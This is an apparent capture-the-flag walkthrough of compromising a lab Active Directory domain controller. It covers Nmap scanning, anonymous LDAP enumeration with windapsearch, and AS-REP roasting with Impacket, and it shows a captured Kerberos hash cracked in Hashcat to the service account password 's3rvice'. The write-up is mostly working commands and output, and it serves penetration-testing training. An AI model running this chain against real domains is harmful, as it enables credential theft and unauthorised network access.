A Path Hidden in Plain Sight: Owning Active Directory
quality 5/10 · average
0 net
AI Summary
A CTF writeup demonstrating Active Directory reconnaissance through anonymous LDAP binding and SMB enumeration on a Windows Server 2016 domain controller, focusing on initial foothold discovery via network scanning and credential enumeration.
Tags
Entities
Jabaribrown
nmap
NetExec
windapsearch.py
Windows Server 2016
htb.local
FOREST
🪟🎬A Path Hidden in Plain Sight: Owning Active Directory | by Jabaribrown - Freedium
Milestone: 20GB Reached
We’ve reached 20GB of stored data — thank you for helping us grow!
Patreon
Ko-fi
Liberapay
Close
< Go to the original
🪟🎬A Path Hidden in Plain Sight: Owning Active Directory
Another day, another hack — and just like that we're back.
Jabaribrown
Follow
~20 min read
·
March 6, 2026 (Updated: March 6, 2026)
·
Free: Yes
Starting with an Nmap scan, of course.
This gives us our first look at what services the machine is exposing and where we might be able to start poking around. jbrown@Jabaris-MacBook-Pro forest % nmap -sV -sC -O -T4 10.129.1.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-04 09:10 -0500
Nmap scan report for 10.129.1.13
Host is up (0.037s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-04 14:17:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Device type: general purpose
Running: Microsoft Windows 2016|2019
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2016 or Server 2019
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2026-03-04T06:17:46-08:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-04T14:17:49
|_ start_date: 2026-03-04T13:59:42
|_clock-skew: mean: 2h46m49s, deviation: 4h37m07s, median: 6m49s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.80 seconds
Now what stands out is LDAP (389), WinRM (5985), and SMB (445). Another thing you'll notice is that we also discovered the domain htb.local , which tells us we're dealing with a Windows domain environment. 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
With WinRM, if we find some credentials we should be able to log in — as long as the user is part of the Remote Management Users group. But before jumping ahead, we'll start by enumerating SMB and LDAP to see if we can find a valid user and hopefully some credentials. jbrown@Jabaris-MacBook-Pro forest % nxc smb 10.129.1.13 -u anonymous -p ""
SMB 10.129.1.13 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.1.13 445 FOREST [-] htb.local\anonymous: STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro forest % nxc smb 10.129.1.13 -u anonymous -p anonymous
SMB 10.129.1.13 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.1.13 445 FOREST [-] htb.local\anonymous:anonymous STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro forest % nxc smb 10.129.1.13 -u guest -p guest
SMB 10.129.1.13 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.1.13 445 FOREST [-] htb.local\guest:guest STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro forest %
Using NetExec, both anonymous and guest logins fail. So next we can try LDAP to see if anonymous bind is allowed using windapsearch.py: jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.44.121
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
We successfully got an anonymous bind, so let's enumerate a bit more and see what we can pull back:
Groups: jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.44.121 -G
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.44.121
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD groups
[+] Found 59 groups:
cn: Users
distinguishedName: CN=Users,CN=Builtin,DC=htb,DC=local
cn: Guests
distinguishedName: CN=Guests,CN=Builtin,DC=htb,DC=local
cn: Remote Desktop Users
distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=htb,DC=local
cn: Network Configuration Operators
distinguishedName: CN=Network Configuration Operators,CN=Builtin,DC=htb,DC=local
cn: Performance Monitor Users
distinguishedName: CN=Performance Monitor Users,CN=Builtin,DC=htb,DC=local
cn: Performance Log Users
distinguishedName: CN=Performance Log Users,CN=Builtin,DC=htb,DC=local
cn: Distributed COM Users
distinguishedName: CN=Distributed COM Users,CN=Builtin,DC=htb,DC=local
cn: IIS_IUSRS
distinguishedName: CN=IIS_IUSRS,CN=Builtin,DC=htb,DC=local
cn: Cryptographic Operators
distinguishedName: CN=Cryptographic Operators,CN=Builtin,DC=htb,DC=local
cn: Event Log Readers
distinguishedName: CN=Event Log Readers,CN=Builtin,DC=htb,DC=local
cn: Certificate Service DCOM Access
distinguishedName: CN=Certificate Service DCOM Access,CN=Builtin,DC=htb,DC=local
cn: RDS Remote Access Servers
distinguishedName: CN=RDS Remote Access Servers,CN=Builtin,DC=htb,DC=local
cn: RDS Endpoint Servers
distinguishedName: CN=RDS Endpoint Servers,CN=Builtin,DC=htb,DC=local
cn: RDS Management Servers
distinguishedName: CN=RDS Management Servers,CN=Builtin,DC=htb,DC=local
cn: Hyper-V Administrators
distinguishedName: CN=Hyper-V Administrators,CN=Builtin,DC=htb,DC=local
cn: Access Control Assistance Operators
distinguishedName: CN=Access Control Assistance Operators,CN=Builtin,DC=htb,DC=local
cn: Remote Management Users
distinguishedName: CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
cn: System Managed Accounts Group
distinguishedName: CN=System Managed Accounts Group,CN=Builtin,DC=htb,DC=local
cn: Storage Replica Administrators
distinguishedName: CN=Storage Replica Administrators,CN=Builtin,DC=htb,DC=local
cn: Domain Computers
distinguishedName: CN=Domain Computers,CN=Users,DC=htb,DC=local
cn: Cert Publishers
distinguishedName: CN=Cert Publishers,CN=Users,DC=htb,DC=local
cn: Domain Users
distinguishedName: CN=Domain Users,CN=Users,DC=htb,DC=local
cn: Domain Guests
distinguishedName: CN=Domain Guests,CN=Users,DC=htb,DC=local
cn: Group Policy Creator Owners
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
cn: RAS and IAS Servers
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local
cn: Pre-Windows 2000 Compatible Access
distinguishedName: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=htb,DC=local
cn: Incoming Forest Trust Builders
distinguishedName: CN=Incoming Forest Trust Builders,CN=Builtin,DC=htb,DC=local
cn: Windows Authorization Access Group
distinguishedName: CN=Windows Authorization Access Group,CN=Builtin,DC=htb,DC=local
cn: Terminal Server License Servers
distinguishedName: CN=Terminal Server License Servers,CN=Builtin,DC=htb,DC=local
cn: Allowed RODC Password Replication Group
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
cn: Denied RODC Password Replication Group
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
cn: Enterprise Read-only Domain Controllers
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
cn: Cloneable Domain Controllers
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
cn: Protected Users
distinguishedName: CN=Protected Users,CN=Users,DC=htb,DC=local
cn: Key Admins
distinguishedName: CN=Key Admins,CN=Users,DC=htb,DC=local
cn: Enterprise Key Admins
distinguishedName: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
cn: DnsAdmins
distinguishedName: CN=DnsAdmins,CN=Users,DC=htb,DC=local
cn: DnsUpdateProxy
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
cn: Organization Management
distinguishedName: CN=Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Recipient Management
distinguishedName: CN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: View-Only Organization Management
distinguishedName: CN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Public Folder Management
distinguishedName: CN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: UM Management
distinguishedName: CN=UM Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Help Desk
distinguishedName: CN=Help Desk,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Records Management
distinguishedName: CN=Records Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Discovery Management
distinguishedName: CN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Server Management
distinguishedName: CN=Server Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Delegated Setup
distinguishedName: CN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Hygiene Management
distinguishedName: CN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Compliance Management
distinguishedName: CN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Security Reader
distinguishedName: CN=Security Reader,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Security Administrator
distinguishedName: CN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Servers
distinguishedName: CN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Trusted Subsystem
distinguishedName: CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Managed Availability Servers
distinguishedName: CN=Managed Availability Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Windows Permissions
distinguishedName: CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: ExchangeLegacyInterop
distinguishedName: CN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
cn: Exchange Install Domain Servers
distinguishedName: CN=Exchange Install Domain Servers,CN=Microsoft Exchange System Objects,DC=htb,DC=local
cn: test
distinguishedName: CN=test,OU=Security Groups,DC=htb,DC=local
[*] Bye!
Users: jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.44.121 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.44.121
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 28 users:
cn: Guest
cn: DefaultAccount
cn: Exchange Online-ApplicationAccount
userPrincipalName: [email protected]
cn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
cn: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
userPrincipalName: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
cn: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
cn: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
cn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
userPrincipalName: [email protected]
cn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
userPrincipalName: [email protected]
cn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
userPrincipalName: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
cn: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
userPrincipalName: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local
cn: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
userPrincipalName: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local
cn: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
userPrincipalName: [email protected]
cn: HealthMailboxfc9daad117b84fe08b081886bd8a5a50
userPrincipalName: [email protected]
cn: HealthMailboxc0a90c97d4994429b15003d6a518f3f5
userPrincipalName: [email protected]
cn: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
userPrincipalName: [email protected]
cn: HealthMailbox968e74dd3edb414cb4018376e7dd95ba
userPrincipalName: [email protected]
cn: HealthMailbox6ded67848a234577a1756e072081d01f
userPrincipalName: [email protected]
cn: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
userPrincipalName: [email protected]
cn: HealthMailboxfd87238e536e49e08738480d300e3772
userPrincipalName: [email protected]
cn: HealthMailboxb01ac647a64648d2a5fa21df27058a24
userPrincipalName: [email protected]
cn: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
userPrincipalName: [email protected]
cn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: [email protected]
cn: Sebastien Caron
userPrincipalName: [email protected]
cn: Lucinda Berger
userPrincipalName: [email protected]
cn: Andy Hislip
userPrincipalName: [email protected]
cn: Mark Brandt
userPrincipalName: [email protected]
cn: Santi Rodriguez
userPrincipalName: [email protected]
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -U --custom "objectClass=*"
***LARGE SNIP****
OU=Service Accounts,DC=htb,DC=local
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
***LARGE SNIP****
Now we can try an AS-REP roasting attack. We'll take the usernames we found and put them into a users list. Once we have that list, we can use Impacket's GetNPUsers.py to query Kerberos and check if any accounts have Do not require Kerberos preauthentication set. If they do, we can grab the AS-REP hash for offline cracking: jbrown@Jabaris-MacBook-Pro examples % while read r; do python3 GetNPUsers.py htb.local/"$r" -request -no-pass -dc-ip 10.129.1.13;done < ../../../forest/users.txt
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for andy
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for mark
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for santi
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for Exchange_Online-ApplicationAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for Migration.8f3e7716-2011-43e4-96b1-aba62d229136
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
[-] User HealthMailboxc3d7722415ad41a5b19e3e00e165edbe doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxfc9daad117b84fe08b081886bd8a5a50
[-] User HealthMailboxfc9daad117b84fe08b081886bd8a5a50 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxc0a90c97d4994429b15003d6a518f3f5
[-] User HealthMailboxc0a90c97d4994429b15003d6a518f3f5 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
[-] User HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox968e74dd3edb414cb4018376e7dd95ba
[-] User HealthMailbox968e74dd3edb414cb4018376e7dd95ba doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox6ded67848a234577a1756e072081d01f
[-] User HealthMailbox6ded67848a234577a1756e072081d01f doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
[-] User HealthMailbox83d6781be36b4bbf8893b03c2ee379ab doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxfd87238e536e49e08738480d300e3772
[-] User HealthMailboxfd87238e536e49e08738480d300e3772 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailboxb01ac647a64648d2a5fa21df27058a24
[-] User HealthMailboxb01ac647a64648d2a5fa21df27058a24 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
[-] User HealthMailbox7108a4e350f84b32a7a90d8e718f78cf doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
[-] User HealthMailbox0659cc188f4c4f9f978f6c2142c4181e doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for Guest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for DefaultAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for svc-alfresco
[email protected]:33270a0ccbfccb67a03fb37a5dc256f8$7d10ab1f7c648e710b079fd6b2767c65c35b324b5c78965b510b1e1e7e4b652d701a2d4ceb2b5d0d1a2f18d620f4057c2526f49f5e7a291cb15af412e5ee55e8cfbabec918022b5f4896f8db5cc6c01e9c732d2b3210557649ef0c963035cf21e2593c02ace6e8b725f89f12f1cc57515e4d7db9af8f9bb1c3de72501e218251bcc86146cd669b91e6458303b1f6e089dda01dba8a12bca26486b800ae440bd7b0197031c677f6a86894cb8fda2a7f5d9d698efb3e6c2f5d7245d9428ddbd48c635561e95f50074ee67ce6daa5fedc4243f0c9fd801ccfda389ad7b50ad15b53da9220d86986
jbrown@Jabaris-MacBook-Pro examples %
Now that we have the TGT hash, we can use Hashcat to try and crack it to recover the password for the service account.
NOTE:
Mode 18200: Kerberos 5 AS-REP etype 23 ($krb5asrep$23$) — RC4-HMAC hash format. jbrown@Jabaris-MacBook-Pro hashcat % ./hashcat -m 18200 ../../forest/hash.txt ../../wordlist/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting
METAL API (Metal 368.52)
========================
* Device #01: Apple M2, skipped
OpenCL API (OpenCL 1.2 (Jul 20 2025 19:29:12)) - Platform #1 [Apple]
====================================================================
* Device #02: Apple M2, GPU, 2730/5461 MB (512 MB allocatable), 10MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 100c
Host memory allocated for this attack: 599 MB (1100 MB free)
Dictionary cache hit:
* Filename..: ../../wordlist/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
[email protected]:33270a0ccbfccb67a03fb37a5dc256f8$7d10ab1f7c648e710b079fd6b2767c65c35b324b5c78965b510b1e1e7e4b652d701a2d4ceb2b5d0d1a2f18d620f4057c2526f49f5e7a291cb15af412e5ee55e8cfbabec918022b5f4896f8db5cc6c01e9c732d2b3210557649ef0c963035cf21e2593c02ace6e8b725f89f12f1cc57515e4d7db9af8f9bb1c3de72501e218251bcc86146cd669b91e6458303b1f6e089dda01dba8a12bca26486b800ae440bd7b0197031c677f6a86894cb8fda2a7f5d9d698efb3e6c2f5d7245d9428ddbd48c635561e95f50074ee67ce6daa5fedc4243f0c9fd801ccfda389ad7b50ad15b53da9220d86986:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:33270a0ccbfccb...d86986
Time.Started.....: Fri Mar 6 07:27:56 2026 (1 sec)
Time.Estimated...: Fri Mar 6 07:27:57 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (../../wordlist/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 9103.7 kH/s (0.57ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4259840/14344384 (29.70%)
Rejected.........: 0/4259840 (0.00%)
Restore.Point....: 3932160/14344384 (27.41%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: seaford12 -> rideordie06
Hardware.Mon.SMC.: Fan0: 0%
Hardware.Mon.#02.: Util: 86% Pwr:641mW
Started: Fri Mar 6 07:27:55 2026
Stopped: Fri Mar 6 07:27:57 2026
jbrown@Jabaris-MacBook-Pro hashcat %
And now we have the password. With this, we can narrow in on our enumeration. We can use the service account username and password with windapsearch.py to see what groups it's a part of and check for any other attributes that might be useful: s3rvice
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -u svc-alfresco -p s3rvice -l svc-alfresco --full
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:HTB\svc-alfresco
[+] Searching for matching DNs for term: "svc-alfresco"
[+] Using DN: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: svc-alfresco
givenName: svc-alfresco
distinguishedName: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
instanceType: 4
whenCreated: 20190920005851.0Z
whenChanged: 20260306123922.0Z
displayName: svc-alfresco
uSNCreated: 26083
memberOf: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
uSNChanged: 1048322
name: svc-alfresco
objectGUID: AhOlWHxMhkaVAtOto6+u8Q==
userAccountControl: 4260352
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 134172734821879692
logonHours: ////////////////////////////
pwdLastSet: 134172743628774723
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAALB4ltxV1shXFsPNPewQAAA==
adminCount: 1
accountExpires: 0
logonCount: 8
sAMAccountName: svc-alfresco
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 20260306123952.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 134172734821098441
msDS-SupportedEncryptionTypes: 0
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
